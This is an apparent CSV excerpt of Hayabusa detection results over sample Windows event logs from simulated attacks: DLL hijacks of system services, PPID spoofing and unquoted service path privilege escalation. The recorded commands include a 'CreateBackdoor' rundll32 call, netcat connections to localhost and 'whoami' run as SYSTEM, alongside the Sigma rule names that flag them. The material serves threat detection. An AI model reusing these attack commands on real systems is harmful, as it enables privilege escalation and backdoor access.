| Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:40.502 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp 
| Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 
747F3D96-9F86-5E75-0000-00101A9F2100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 
+09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 
+09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 
747F3D96-0880-5E76-0000-001014202B00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 
747F3D96-8AEC-5E76-0000-00101DDB8003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | 
Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT 
